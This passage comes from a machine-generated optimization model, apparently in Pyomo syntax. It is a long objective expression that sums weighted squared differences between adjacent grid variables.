8.11690209768664*m.x237)**2 + (1.3*m.x236 - 1.3*m.x237)**2) + 4.76638251784575*((8.11690209768664
*m.x211 - 8.11690209768664*m.x238)**2 + (1.3*m.x237 - 1.3*m.x238)**2) + 4.76638251784575*((
8.11690209768664*m.x212 - 8.11690209768664*m.x239)**2 + (1.3*m.x238 - 1.3*m.x239)**2) +
4.76638251784575*((8.11690209768664*m.x213 - 8.11690209768664*m.x240)**2 + (1.3*m.x239 - 1.3*
m.x240)**2) + 4.76638251784575*((8.11690209768664*m.x214 - 8.11690209768664*m.x241)**2 + (1.3*
m.x240 - 1.3*m.x241)**2) + 4.76638251784575*((8.11690209768664*m.x215 - 8.11690209768664*m.x242)
**2 + (1.3*m.x241 - 1.3*m.x242)**2) + 4.76638251784575*((8.11690209768664*m.x216 -
8.11690209768664*m.x243)**2 + (1.3*m.x242 - 1.3*m.x243)**2) + 4.62960356384549*((8.11690209768664
*m.x218 - 8.11690209768664*m.x245)**2 + (1.3*m.x244 - 1.3*m.x245)**2) + 4.62960356384549*((
8.11690209768664*m.x219 - 8.11690209768664*m.x246)**2 + (1.3*m.x245 - 1.3*m.x246)**2) +
4.62960356384549*((8.11690209768664*m.x220 - 8.11690209768664*m.x247)**2 + (1.3*m.x246 - 1.3*
m.x247)**2) + 4.62960356384549*((8.11690209768664*m.x221 - 8.11690209768664*m.x248)**2 + (1.3*
m.x247 - 1.3*m.x248)**2) + 4.62960356384549*((8.11690209768664*m.x222 - 8.11690209768664*m.x249)
**2 + (1.3*m.x248 - 1.3*m.x249)**2) + 4.62960356384549*((8.11690209768664*m.x223 -
8.11690209768664*m.x250)**2 + (1.3*m.x249 - 1.3*m.x250)**2) + 4.62960356384549*((8.11690209768664
*m.x224 - 8.11690209768664*m.x251)**2 + (1.3*m.x250 - 1.3*m.x251)**2) + 4.62960356384549*((
8.11690209768664*m.x225 - 8.11690209768664*m.x252)**2 + (1.3*m.x251 - 1.3*m.x252)**2) +
4.62960356384549*((8.11690209768664*m.x226 - 8.11690209768664*m.x253)**2 + (1.3*m.x252 - 1.3*
m.x253)**2) + 4.62960356384549*((8.11690209768664*m.x227 - 8.11690209768664*m.x254)**2 + (1.3*
m.x253 - 1.3*m.x254)**2) + 4.62960356384549*((8.11690209768664*m.x228 - 8.11690209768664*m.x255)
**2 + (1.3*m.x254 - 1.3*m.x255)**2) + 4.62960356384549*((8.11690209768664*m.x229 -
8.11690209768664*m.x256)**2 + (1.3*m.x255 - 1.3*m.x256)**2) + 4.62960356384549*((8.11690209768664
*m.x230 - 8.11690209768664*m.x257)**2 + (1.3*m.x256 - 1.3*m.x257)**2) + 4.62960356384549*((
8.11690209768664*m.x231 - 8.11690209768664*m.x258)**2 + (1.3*m.x257 - 1.3*m.x258)**2) +
4.62960356384549*((8.11690209768664*m.x232 - 8.11690209768664*m.x259)**2 + (1.3*m.x258 - 1.3*
m.x259)**2) + 4.62960356384549*((8.11690209768664*m.x233 - 8.11690209768664*m.x260)**2 + (1.3*
m.x259 - 1.3*m.x260)**2) + 4.62960356384549*((8.11690209768664*m.x234 - 8.11690209768664*m.x261)
**2 + (1.3*m.x260 - 1.3*m.x261)**2) + 4.62960356384549*((8.11690209768664*m.x235 -
8.11690209768664*m.x262)**2 + (1.3*m.x261 - 1.3*m.x262)**2) + 4.62960356384549*((8.11690209768664
*m.x236 - 8.11690209768664*m.x263)**2 + (1.3*m.x262 - 1.3*m.x263)**2) + 4.62960356384549*((
8.11690209768664*m.x237 - 8.11690209768664*m.x264)**2 + (1.3*m.x263 - 1.3*m.x264)**2) +
4.62960356384549*((8.11690209768664*m.x238 - 8.11690209768664*m.x265)**2 + (1.3*m.x264 - 1.3*
m.x265)**2) + 4.62960356384549*((8.11690209768664*m.x239 - 8.11690209768664*m.x266)**2 + (1.3*
m.x265 - 1.3*m.x266)**2) + 4.62960356384549*((8.11690209768664*m.x240 - 8.11690209768664*m.x267)
**2 + (1.3*m.x266 - 1.3*m.x267)**2) + 4.62960356384549*((8.11690209768664*m.x241 -
8.11690209768664*m.x268)**2 + (1.3*m.x267 - 1.3*m.x268)**2) + 4.62960356384549*((8.11690209768664
*m.x242 - 8.11690209768664*m.x269)**2 + (1.3*m.x268 - 1.3*m.x269)**2) + 4.62960356384549*((
8.11690209768664*m.x243 - 8.11690209768664*m.x270)**2 + (1.3*m.x269 - 1.3*m.x270)**2) +
4.48565498144175*((8.11690209768664*m.x245 - 8.11690209768664*m.x272)**2 + (1.3*m.x271 - 1.3*
m.x272)**2) + 4.48565498144175*((8.11690209768664*m.x246 - 8.11690209768664*m.x273)**2 + (1.3*
m.x272 - 1.3*m.x273)**2) + 4.48565498144175*((8.11690209768664*m.x247 - 8.11690209768664*m.x274)
**2 + (1.3*m.x273 - 1.3*m.x274)**2) + 4.48565498144175*((8.11690209768664*m.x248 -
8.11690209768664*m.x275)**2 + (1.3*m.x274 - 1.3*m.x275)**2) + 4.48565498144175*((8.11690209768664
*m.x249 - 8.11690209768664*m.x276)**2 + (1.3*m.x275 - 1.3*m.x276)**2) + 4.48565498144175*((
8.11690209768664*m.x250 - 8.11690209768664*m.x277)**2 + (1.3*m.x276 - 1.3*m.x277)**2) +
4.48565498144175*((8.11690209768664*m.x251 - 8.11690209768664*m.x278)**2 + (1.3*m.x277 - 1.3*
m.x278)**2) + 4.48565498144175*((8.11690209768664*m.x252 - 8.11690209768664*m.x279)**2 + (1.3*
m.x278 - 1.3*m.x279)**2) + 4.48565498144175*((8.11690209768664*m.x253 - 8.11690209768664*m.x280)
**2 + (1.3*m.x279 - 1.3*m.x280)**2) + 4.48565498144175*((8.11690209768664*m.x254 -
8.11690209768664*m.x281)**2 + (1.3*m.x280 - 1.3*m.x281)**2) + 4.48565498144175*((8.11690209768664
*m.x255 - 8.11690209768664*m.x282)**2 + (1.3*m.x281 - 1.3*m.x282)**2) + 4.48565498144175*((
8.11690209768664*m.x256 - 8.11690209768664*m.x283)**2 + (1.3*m.x282 - 1.3*m.x283)**2) +
4.48565498144175*((8.11690209768664*m.x257 - 8.11690209768664*m.x284)**2 + (1.3*m.x283 - 1.3*
m.x284)**2) + 4.48565498144175*((8.11690209768664*m.x258 - 8.11690209768664*m.x285)**2 + (1.3*
m.x284 - 1.3*m.x285)**2) + 4.48565498144175*((8.11690209768664*m.x259 - 8.11690209768664*m.x286)
**2 + (1.3*m.x285 - 1.3*m.x286)**2) + 4.48565498144175*((8.11690209768664*m.x260 -
8.11690209768664*m.x287)**2 + (1.3*m.x286 - 1.3*m.x287)**2) + 4.48565498144175*((8.11690209768664
*m.x261 - 8.11690209768664*m.x288)**2 + (1.3*m.x287 - 1.3*m.x288)**2) + 4.48565498144175*((
8.11690209768664*m.x262 - 8.11690209768664*m.x289)**2 + (1.3*m.x288 - 1.3*m.x289)**2) +
4.48565498144175*((8.11690209768664*m.x263 - 8.11690209768664*m.x290)**2 + (1.3*m.x289 - 1.3*
m.x290)**2) + 4.48565498144175*((8.11690209768664*m.x264 - 8.11690209768664*m.x291)**2 + (1.3*
m.x290 - 1.3*m.x291)**2) + 4.48565498144175*((8.11690209768664*m.x265 - 8.11690209768664*m.x292)
**2 + (1.3*m.x291 - 1.3*m.x292)**2) + 4.48565498144175*((8.11690209768664*m.x266 -
8.11690209768664*m.x293)**2 + (1.3*m.x292 - 1.3*m.x293)**2) + 4.48565498144175*((8.11690209768664
*m.x267 - 8.11690209768664*m.x294)**2 + (1.3*m.x293 - 1.3*m.x294)**2) + 4.48565498144175*((
8.11690209768664*m.x268 - 8.11690209768664*m.x295)**2 + (1.3*m.x294 - 1.3*m.x295)**2) +
4.48565498144175*((8.11690209768664*m.x269 - 8.11690209768664*m.x296)**2 + (1.3*m.x295 - 1.3*
m.x296)**2) + 4.48565498144175*((8.11690209768664*m.x270 - 8.11690209768664*m.x297)**2 + (1.3*
m.x296 - 1.3*m.x297)**2) + 4.33723936015931*((8.11690209768664*m.x272 - 8.11690209768664*m.x299)
**2 + (1.3*m.x298 - 1.3*m.x299)**2) + 4.33723936015931*((8.11690209768664*m.x273 -
8.11690209768664*m.x300)**2 + (1.3*m.x299 - 1.3*m.x300)**2) + 4.33723936015931*((8.11690209768664
*m.x274 - 8.11690209768664*m.x301)**2 + (1.3*m.x300 - 1.3*m.x301)**2) + 4.33723936015931*((
8.11690209768664*m.x275 - 8.11690209768664*m.x302)**2 + (1.3*m.x301 - 1.3*m.x302)**2) +
4.33723936015931*((8.11690209768664*m.x276 - 8.11690209768664*m.x303)**2 + (1.3*m.x302 - 1.3*
m.x303)**2) + 4.33723936015931*((8.11690209768664*m.x277 - 8.11690209768664*m.x304)**2 + (1.3*
m.x303 - 1.3*m.x304)**2) + 4.33723936015931*((8.11690209768664*m.x278 - 8.11690209768664*m.x305)
**2 + (1.3*m.x304 - 1.3*m.x305)**2) + 4.33723936015931*((8.11690209768664*m.x279 -
8.11690209768664*m.x306)**2 + (1.3*m.x305 - 1.3*m.x306)**2) + 4.33723936015931*((8.11690209768664
*m.x280 - 8.11690209768664*m.x307)**2 + (1.3*m.x306 - 1.3*m.x307)**2) + 4.33723936015931*((
8.11690209768664*m.x281 - 8.11690209768664*m.x308)**2 + (1.3*m.x307 - 1.3*m.x308)**2) +
4.33723936015931*((8.11690209768664*m.x282 - 8.11690209768664*m.x309)**2 + (1.3*m.x308 - 1.3*
m.x309)**2) + 4.33723936015931*((8.11690209768664*m.x283 - 8.11690209768664*m.x310)**2 + (1.3*
m.x309 - 1.3*m.x310)**2) + 4.33723936015931*((8.11690209768664*m.x284 - 8.11690209768664*m.x311)
**2 + (1.3*m.x310 - 1.3*m.x311)**2) + 4.33723936015931*((8.11690209768664*m.x285 -
8.11690209768664*m.x312)**2 + (1.3*m.x311 - 1.3*m.x312)**2) + 4.33723936015931*((8.11690209768664
*m.x286 - 8.11690209768664*m.x313)**2 + (1.3*m.x312 - 1.3*m.x313)**2) + 4.33723936015931*((
8.11690209768664*m.x287 - 8.11690209768664*m.x314)**2 + (1.3*m.x313 - 1.3*m.x314)**2) +
4.33723936015931*((8.11690209768664*m.x288 - 8.11690209768664*m.x315)**2 + (1.3*m.x314 - 1.3*
m.x315)**2) + 4.33723936015931*((8.11690209768664*m.x289 - 8.11690209768664*m.x316)**2 + (1.3*
m.x315 - 1.3*m.x316)**2) + 4.33723936015931*((8.11690209768664*m.x290 - 8.11690209768664*m.x317)
**2 + (1.3*m.x316 - 1.3*m.x317)**2) + 4.33723936015931*((8.11690209768664*m.x291 -
8.11690209768664*m.x318)**2 + (1.3*m.x317 - 1.3*m.x318)**2) + 4.33723936015931*((8.11690209768664
*m.x292 - 8.11690209768664*m.x319)**2 + (1.3*m.x318 - 1.3*m.x319)**2) + 4.33723936015931*((
8.11690209768664*m.x293 - 8.11690209768664*m.x320)**2 + (1.3*m.x319 - 1.3*m.x320)**2) +
4.33723936015931*((8.11690209768664*m.x294 - 8.11690209768664*m.x321)**2 + (1.3*m.x320 - 1.3*
m.x321)**2) + 4.33723936015931*((8.11690209768664*m.x295 - 8.11690209768664*m.x322)**2 + (1.3*
m.x321 - 1.3*m.x322)**2) + 4.33723936015931*((8.11690209768664*m.x296 - 8.11690209768664*m.x323)
**2 + (1.3*m.x322 - 1.3*m.x323)**2) + 4.33723936015931*((8.11690209768664*m.x297 -
8.11690209768664*m.x324)**2 + (1.3*m.x323 - 1.3*m.x324)**2) + 4.18699886780755*((8.11690209768664
*m.x299 - 8.11690209768664*m.x326)**2 + (1.3*m.x325 - 1.3*m.x326)**2) + 4.18699886780755*((
8.11690209768664*m.x300 - 8.11690209768664*m.x327)**2 + (1.3*m.x326 - 1.3*m.x327)**2) +
4.18699886780755*((8.11690209768664*m.x301 - 8.11690209768664*m.x328)**2 + (1.3*m.x327 - 1.3*
m.x328)**2) + 4.18699886780755*((8.11690209768664*m.x302 - 8.11690209768664*m.x329)**2 + (1.3*
m.x328 - 1.3*m.x329)**2) + 4.18699886780755*((8.11690209768664*m.x303 - 8.11690209768664*m.x330)
**2 + (1.3*m.x329 - 1.3*m.x330)**2) + 4.18699886780755*((8.11690209768664*m.x304 -
8.11690209768664*m.x331)**2 + (1.3*m.x330 - 1.3*m.x331)**2) + 4.18699886780755*((8.11690209768664
*m.x305 - 8.11690209768664*m.x332)**2 + (1.3*m.x331 - 1.3*m.x332)**2) + 4.18699886780755*((
8.11690209768664*m.x306 - 8.11690209768664*m.x333)**2 + (1.3*m.x332 - 1.3*m.x333)**2) +
4.18699886780755*((8.11690209768664*m.x307 - 8.11690209768664*m.x334)**2 + (1.3*m.x333 - 1.3*
m.x334)**2) + 4.18699886780755*((8.11690209768664*m.x308 - 8.11690209768664*m.x335)**2 + (1.3*
m.x334 - 1.3*m.x335)**2) + 4.18699886780755*((8.11690209768664*m.x309 - 8.11690209768664*m.x336)
**2 + (1.3*m.x335 - 1.3*m.x336)**2) + 4.18699886780755*((8.11690209768664*m.x310 -
8.11690209768664*m.x337)**2 + (1.3*m.x336 - 1.3*m.x337)**2) + 4.18699886780755*((8.11690209768664
*m.x311 - 8.11690209768664*m.x338)**2 + (1.3*m.x337 - 1.3*m.x338)**2) + 4.18699886780755*((
8.11690209768664*m.x312 - 8.11690209768664*m.x339)**2 + (1.3*m.x338 - 1.3*m.x339)**2) +
4.18699886780755*((8.11690209768664*m.x313 - 8.11690209768664*m.x340)**2 + (1.3*m.x339 - 1.3*
m.x340)**2) + 4.18699886780755*((8.11690209768664*m.x314 - 8.11690209768664*m.x341)**2 + (1.3*
m.x340 - 1.3*m.x341)**2) + 4.18699886780755*((8.11690209768664*m.x315 - 8.11690209768664*m.x342)
**2 + (1.3*m.x341 - 1.3*m.x342)**2) + 4.18699886780755*((8.11690209768664*m.x316 -
8.11690209768664*m.x343)**2 + (1.3*m.x342 - 1.3*m.x343)**2) + 4.18699886780755*((8.11690209768664
*m.x317 - 8.11690209768664*m.x344)**2 + (1.3*m.x343 - 1.3*m.x344)**2) + 4.18699886780755*((
8.11690209768664*m.x318 - 8.11690209768664*m.x345)**2 + (1.3*m.x344 - 1.3*m.x345)**2) +
4.18699886780755*((8.11690209768664*m.x319 - 8.11690209768664*m.x346)**2 + (1.3*m.x345 - 1.3*
m.x346)**2) + 4.18699886780755*((8.11690209768664*m.x320 - 8.11690209768664*m.x347)**2 + (1.3*
m.x346 - 1.3*m.x347)**2) + 4.18699886780755*((8.11690209768664*m.x321 - 8.11690209768664*m.x348)
**2 + (1.3*m.x347 - 1.3*m.x348)**2) + 4.18699886780755*((8.11690209768664*m.x322 -
8.11690209768664*m.x349)**2 + (1.3*m.x348 - 1.3*m.x349)**2) + 4.18699886780755*((8.11690209768664
*m.x323 - 8.11690209768664*m.x350)**2 + (1.3*m.x349 - 1.3*m.x350)**2) + 4.18699886780755*((
8.11690209768664*m.x324 - 8.11690209768664*m.x351)**2 + (1.3*m.x350 - 1.3*m.x351)**2) +
4.0374532003277*((8.11690209768664*m.x326 - 8.11690209768664*m.x353)**2 + (1.3*m.x352 - 1.3*
m.x353)**2) + 4.0374532003277*((8.11690209768664*m.x327 - 8.11690209768664*m.x354)**2 + (1.3*
m.x353 - 1.3*m.x354)**2) + 4.0374532003277*((8.11690209768664*m.x328 - 8.11690209768664*m.x355)**
2 + (1.3*m.x354 - 1.3*m.x355)**2) + 4.0374532003277*((8.11690209768664*m.x329 - 8.11690209768664*
m.x356)**2 + (1.3*m.x355 - 1.3*m.x356)**2) + 4.0374532003277*((8.11690209768664*m.x330 -
8.11690209768664*m.x357)**2 + (1.3*m.x356 - 1.3*m.x357)**2) + 4.0374532003277*((8.11690209768664*
m.x331 - 8.11690209768664*m.x358)**2 + (1.3*m.x357 - 1.3*m.x358)**2) + 4.0374532003277*((
8.11690209768664*m.x332 - 8.11690209768664*m.x359)**2 + (1.3*m.x358 - 1.3*m.x359)**2) +
4.0374532003277*((8.11690209768664*m.x333 - 8.11690209768664*m.x360)**2 + (1.3*m.x359 - 1.3*
m.x360)**2) + 4.0374532003277*((8.11690209768664*m.x334 - 8.11690209768664*m.x361)**2 + (1.3*
m.x360 - 1.3*m.x361)**2) + 4.0374532003277*((8.11690209768664*m.x335 - 8.11690209768664*m.x362)**
2 + (1.3*m.x361 - 1.3*m.x362)**2) + 4.0374532003277*((8.11690209768664*m.x336 - 8.11690209768664*
m.x363)**2 + (1.3*m.x362 - 1.3*m.x363)**2) + 4.0374532003277*((8.11690209768664*m.x337 -
8.11690209768664*m.x364)**2 + (1.3*m.x363 - 1.3*m.x364)**2) + 4.0374532003277*((8.11690209768664*
m.x338 - 8.11690209768664*m.x365)**2 + (1.3*m.x364 - 1.3*m.x365)**2) + 4.0374532003277*((
8.11690209768664*m.x339 - 8.11690209768664*m.x366)**2 + (1.3*m.x365 - 1.3*m.x366)**2) +
4.0374532003277*((8.11690209768664*m.x340 - 8.11690209768664*m.x367)**2 + (1.3*m.x366 - 1.3*
m.x367)**2) + 4.0374532003277*((8.11690209768664*m.x341 - 8.11690209768664*m.x368)**2 + (1.3*
m.x367 - 1.3*m.x368)**2) + 4.0374532003277*((8.11690209768664*m.x342 - 8.11690209768664*m.x369)**
2 + (1.3*m.x368 - 1.3*m.x369)**2) + 4.0374532003277*((8.11690209768664*m.x343 - 8.11690209768664*
m.x370)**2 + (1.3*m.x369 - 1.3*m.x370)**2) + 4.0374532003277*((8.11690209768664*m.x344 -
8.11690209768664*m.x371)**2 + (1.3*m.x370 - 1.3*m.x371)**2) + 4.0374532003277*((8.11690209768664*
m.x345 - 8.11690209768664*m.x372)**2 + (1.3*m.x371 - 1.3*m.x372)**2) + 4.0374532003277*((
8.11690209768664*m.x346 - 8.11690209768664*m.x373)**2 + (1.3*m.x372 - 1.3*m.x373)**2) +
4.0374532003277*((8.11690209768664*m.x347 - 8.11690209768664*m.x374)**2 + (1.3*m.x373 - 1.3*
m.x374)**2) + 4.0374532003277*((8.11690209768664*m.x348 - 8.11690209768664*m.x375)**2 + (1.3*
m.x374 - 1.3*m.x375)**2) + 4.0374532003277*((8.11690209768664*m.x349 - 8.11690209768664*m.x376)**
2 + (1.3*m.x375 - 1.3*m.x376)**2) + 4.0374532003277*((8.11690209768664*m.x350 - 8.11690209768664*
m.x377)**2 + (1.3*m.x376 - 1.3*m.x377)**2) + 4.0374532003277*((8.11690209768664*m.x351 -
8.11690209768664*m.x378)**2 + (1.3*m.x377 - 1.3*m.x378)**2) + 3.89094933535162*((8.11690209768664
*m.x353 - 8.11690209768664*m.x380)**2 + (1.3*m.x379 - 1.3*m.x380)**2) + 3.89094933535162*((
8.11690209768664*m.x354 - 8.11690209768664*m.x381)**2 + (1.3*m.x380 - 1.3*m.x381)**2) +
3.89094933535162*((8.11690209768664*m.x355 - 8.11690209768664*m.x382)**2 + (1.3*m.x381 - 1.3*
m.x382)**2) + 3.89094933535162*((8.11690209768664*m.x356 - 8.11690209768664*m.x383)**2 + (1.3*
m.x382 - 1.3*m.x383)**2) + 3.89094933535162*((8.11690209768664*m.x357 - 8.11690209768664*m.x384)
**2 + (1.3*m.x383 - 1.3*m.x384)**2) + 3.89094933535162*((8.11690209768664*m.x358 -
8.11690209768664*m.x385)**2 + (1.3*m.x384 - 1.3*m.x385)**2) + 3.89094933535162*((8.11690209768664
*m.x359 - 8.11690209768664*m.x386)**2 + (1.3*m.x385 - 1.3*m.x386)**2) + 3.89094933535162*((
8.11690209768664*m.x360 - 8.11690209768664*m.x387)**2 + (1.3*m.x386 - 1.3*m.x387)**2) +
3.89094933535162*((8.11690209768664*m.x361 - 8.11690209768664*m.x388)**2 + (1.3*m.x387 - 1.3*
m.x388)**2) + 3.89094933535162*((8.11690209768664*m.x362 - 8.11690209768664*m.x389)**2 + (1.3*
m.x388 - 1.3*m.x389)**2) + 3.89094933535162*((8.11690209768664*m.x363 - 8.11690209768664*m.x390)
**2 + (1.3*m.x389 - 1.3*m.x390)**2) + 3.89094933535162*((8.11690209768664*m.x364 -
8.11690209768664*m.x391)**2 + (1.3*m.x390 - 1.3*m.x391)**2) + 3.89094933535162*((8.11690209768664
*m.x365 - 8.11690209768664*m.x392)**2 + (1.3*m.x391 - 1.3*m.x392)**2) + 3.89094933535162*((
8.11690209768664*m.x366 - 8.11690209768664*m.x393)**2 + (1.3*m.x392 - 1.3*m.x393)**2) +
3.89094933535162*((8.11690209768664*m.x367 - 8.11690209768664*m.x394)**2 + (1.3*m.x393 - 1.3*
m.x394)**2) + 3.89094933535162*((8.11690209768664*m.x368 - 8.11690209768664*m.x395)**2 + (1.3*
m.x394 - 1.3*m.x395)**2) + 3.89094933535162*((8.11690209768664*m.x369 - 8.11690209768664*m.x396)
**2 + (1.3*m.x395 - 1.3*m.x396)**2) + 3.89094933535162*((8.11690209768664*m.x370 -
8.11690209768664*m.x397)**2 + (1.3*m.x396 - 1.3*m.x397)**2) + 3.89094933535162*((8.11690209768664
*m.x371 - 8.11690209768664*m.x398)**2 + (1.3*m.x397 - 1.3*m.x398)**2) + 3.89094933535162*((
8.11690209768664*m.x372 - 8.11690209768664*m.x399)**2 + (1.3*m.x398 - 1.3*m.x399)**2) +
3.89094933535162*((8.11690209768664*m.x373 - 8.11690209768664*m.x400)**2 + (1.3*m.x399 - 1.3*
m.x400)**2) + 3.89094933535162*((8.11690209768664*m.x374 - 8.11690209768664*m.x401)**2 + (1.3*
m.x400 - 1.3*m.x401)**2) + 3.89094933535162*((8.11690209768664*m.x375 - 8.11690209768664*m.x402)
**2 + (1.3*m.x401 - 1.3*m.x402)**2) + 3.89094933535162*((8.11690209768664*m.x376 -
8.11690209768664*m.x403)**2 + (1.3*m.x402 - 1.3*m.x403)**2) + 3.89094933535162*((8.11690209768664
*m.x377 - 8.11690209768664*m.x404)**2 + (1.3*m.x403 - 1.3*m.x404)**2) + 3.89094933535162*((
8.11690209768664*m.x378 - 8.11690209768664*m.x405)**2 + (1.3*m.x404 - 1.3*m.x405)**2) +
3.7496242306139*((8.11690209768664*m.x380 - 8.11690209768664*m.x407)**2 + (1.3*m.x406 - 1.3*
m.x407)**2) + 3.7496242306139*((8.11690209768664*m.x381 - 8.11690209768664*m.x408)**2 + (1.3*
m.x407 - 1.3*m.x408)**2) + 3.7496242306139*((8.11690209768664*m.x382 - 8.11690209768664*m.x409)**
2 + (1.3*m.x408 - 1.3*m.x409)**2) + 3.7496242306139*((8.11690209768664*m.x383 - 8.11690209768664*
m.x410)**2 + (1.3*m.x409 - 1.3*m.x410)**2) + 3.7496242306139*((8.11690209768664*m.x384 -
8.11690209768664*m.x411)**2 + (1.3*m.x410 - 1.3*m.x411)**2) + 3.7496242306139*((8.11690209768664*
m.x385 - 8.11690209768664*m.x412)**2 + (1.3*m.x411 - 1.3*m.x412)**2) + 3.7496242306139*((
8.11690209768664*m.x386 - 8.11690209768664*m.x413)**2 + (1.3*m.x412 - 1.3*m.x413)**2) +
3.7496242306139*((8.11690209768664*m.x387 - 8.11690209768664*m.x414)**2 + (1.3*m.x413 - 1.3*
m.x414)**2) + 3.7496242306139*((8.11690209768664*m.x388 - 8.11690209768664*m.x415)**2 + (1.3*
m.x414 - 1.3*m.x415)**2) + 3.7496242306139*((8.11690209768664*m.x389 - 8.11690209768664*m.x416)**
2 + (1.3*m.x415 - 1.3*m.x416)**2) + 3.7496242306139*((8.11690209768664*m.x390 - 8.11690209768664*
m.x417)**2 + (1.3*m.x416 - 1.3*m.x417)**2) + 3.7496242306139*((8.11690209768664*m.x391 -
8.11690209768664*m.x418)**2 + (1.3*m.x417 - 1.3*m.x418)**2) + 3.7496242306139*((8.11690209768664*
m.x392 - 8.11690209768664*m.x419)**2 + (1.3*m.x418 - 1.3*m.x419)**2) + 3.7496242306139*((
8.11690209768664*m.x393 - 8.11690209768664*m.x420)**2 + (1.3*m.x419 - 1.3*m.x420)**2) +
3.7496242306139*((8.11690209768664*m.x394 - 8.11690209768664*m.x421)**2 + (1.3*m.x420 - 1.3*
m.x421)**2) + 3.7496242306139*((8.11690209768664*m.x395 - 8.11690209768664*m.x422)**2 + (1.3*
m.x421 - 1.3*m.x422)**2) + 3.7496242306139*((8.11690209768664*m.x396 - 8.11690209768664*m.x423)**
2 + (1.3*m.x422 - 1.3*m.x423)**2) + 3.7496242306139*((8.11690209768664*m.x397 - 8.11690209768664*
m.x424)**2 + (1.3*m.x423 - 1.3*m.x424)**2) + 3.7496242306139*((8.11690209768664*m.x398 -
8.11690209768664*m.x425)**2 + (1.3*m.x424 - 1.3*m.x425)**2) + 3.7496242306139*((8.11690209768664*
m.x399 - 8.11690209768664*m.x426)**2 + (1.3*m.x425 - 1.3*m.x426)**2) + 3.7496242306139*((
8.11690209768664*m.x400 - 8.11690209768664*m.x427)**2 + (1.3*m.x426 - 1.3*m.x427)**2) +
3.7496242306139*((8.11690209768664*m.x401 - 8.11690209768664*m.x428)**2 + (1.3*m.x427 - 1.3*
m.x428)**2) + 3.7496242306139*((8.11690209768664*m.x402 - 8.11690209768664*m.x429)**2 + (1.3*
m.x428 - 1.3*m.x429)**2) + 3.7496242306139*((8.11690209768664*m.x403 - 8.11690209768664*m.x430)**
2 + (1.3*m.x429 - 1.3*m.x430)**2) + 3.7496242306139*((8.11690209768664*m.x404 - 8.11690209768664*
m.x431)**2 + (1.3*m.x430 - 1.3*m.x431)**2) + 3.7496242306139*((8.11690209768664*m.x405 -
8.11690209768664*m.x432)**2 + (1.3*m.x431 - 1.3*m.x432)**2) + 3.61538071680863*((8.11690209768664
*m.x407 - 8.11690209768664*m.x434)**2 + (1.3*m.x433 - 1.3*m.x434)**2) + 3.61538071680863*((
8.11690209768664*m.x408 - 8.11690209768664*m.x435)**2 + (1.3*m.x434 - 1.3*m.x435)**2) +
3.61538071680863*((8.11690209768664*m.x409 - 8.11690209768664*m.x436)**2 + (1.3*m.x435 - 1.3*
m.x436)**2) + 3.61538071680863*((8.11690209768664*m.x410 - 8.11690209768664*m.x437)**2 + (1.3*
m.x436 - 1.3*m.x437)**2) + 3.61538071680863*((8.11690209768664*m.x411 - 8.11690209768664*m.x438)
**2 + (1.3*m.x437 - 1.3*m.x438)**2) + 3.61538071680863*((8.11690209768664*m.x412 -
8.11690209768664*m.x439)**2 + (1.3*m.x438 - 1.3*m.x439)**2) + 3.61538071680863*((8.11690209768664
*m.x413 - 8.11690209768664*m.x440)**2 + (1.3*m.x439 - 1.3*m.x440)**2) + 3.61538071680863*((
8.11690209768664*m.x414 - 8.11690209768664*m.x441)**2 + (1.3*m.x440 - 1.3*m.x441)**2) +
3.61538071680863*((8.11690209768664*m.x415 - 8.11690209768664*m.x442)**2 + (1.3*m.x441 - 1.3*
m.x442)**2) + 3.61538071680863*((8.11690209768664*m.x416 - 8.11690209768664*m.x443)**2 + (1.3*
m.x442 - 1.3*m.x443)**2) + 3.61538071680863*((8.11690209768664*m.x417 - 8.11690209768664*m.x444)
**2 + (1.3*m.x443 - 1.3*m.x444)**2) + 3.61538071680863*((8.11690209768664*m.x418 -
8.11690209768664*m.x445)**2 + (1.3*m.x444 - 1.3*m.x445)**2) + 3.61538071680863*((8.11690209768664
*m.x419 - 8.11690209768664*m.x446)**2 + (1.3*m.x445 - 1.3*m.x446)**2) + 3.61538071680863*((
8.11690209768664*m.x420 - 8.11690209768664*m.x447)**2 + (1.3*m.x446 - 1.3*m.x447)**2) +
3.61538071680863*((8.11690209768664*m.x421 - 8.11690209768664*m.x448)**2 + (1.3*m.x447 - 1.3*
m.x448)**2) + 3.61538071680863*((8.11690209768664*m.x422 - 8.11690209768664*m.x449)**2 + (1.3*
m.x448 - 1.3*m.x449)**2) + 3.61538071680863*((8.11690209768664*m.x423 - 8.11690209768664*m.x450)
**2 + (1.3*m.x449 - 1.3*m.x450)**2) + 3.61538071680863*((8.11690209768664*m.x424 -
8.11690209768664*m.x451)**2 + (1.3*m.x450 - 1.3*m.x451)**2) + 3.61538071680863*((8.11690209768664
*m.x425 - 8.11690209768664*m.x452)**2 + (1.3*m.x451 - 1.3*m.x452)**2) + 3.61538071680863*((
8.11690209768664*m.x426 - 8.11690209768664*m.x453)**2 + (1.3*m.x452 - 1.3*m.x453)**2) +
3.61538071680863*((8.11690209768664*m.x427 - 8.11690209768664*m.x454)**2 + (1.3*m.x453 - 1.3*
m.x454)**2) + 3.61538071680863*((8.11690209768664*m.x428 - 8.11690209768664*m.x455)**2 + (1.3*
m.x454 - 1.3*m.x455)**2) + 3.61538071680863*((8.11690209768664*m.x429 - 8.11690209768664*m.x456)
**2 + (1.3*m.x455 - 1.3*m.x456)**2) + 3.61538071680863*((8.11690209768664*m.x430 -
8.11690209768664*m.x457)**2 + (1.3*m.x456 - 1.3*m.x457)**2) + 3.61538071680863*((8.11690209768664
*m.x431 - 8.11690209768664*m.x458)**2 + (1.3*m.x457 - 1.3*m.x458)**2) + 3.61538071680863*((
8.11690209768664*m.x432 - 8.11690209768664*m.x459)**2 + (1.3*m.x458 - 1.3*m.x459)**2) +
3.48987601495026*((8.11690209768664*m.x434 - 8.11690209768664*m.x461)**2 + (1.3*m.x460 - 1.3*
m.x461)**2) + 3.48987601495026*((8.11690209768664*m.x435 - 8.11690209768664*m.x462)**2 + (1.3*
m.x461 - 1.3*m.x462)**2) + 3.48987601495026*((8.11690209768664*m.x436 - 8.11690209768664*m.x463)
**2 + (1.3*m.x462 - 1.3*m.x463)**2) + 3.48987601495026*((8.11690209768664*m.x437 -
8.11690209768664*m.x464)**2 + (1.3*m.x463 - 1.3*m.x464)**2) + 3.48987601495026*((8.11690209768664
*m.x438 - 8.11690209768664*m.x465)**2 + (1.3*m.x464 - 1.3*m.x465)**2) + 3.48987601495026*((
8.11690209768664*m.x439 - 8.11690209768664*m.x466)**2 + (1.3*m.x465 - 1.3*m.x466)**2) +
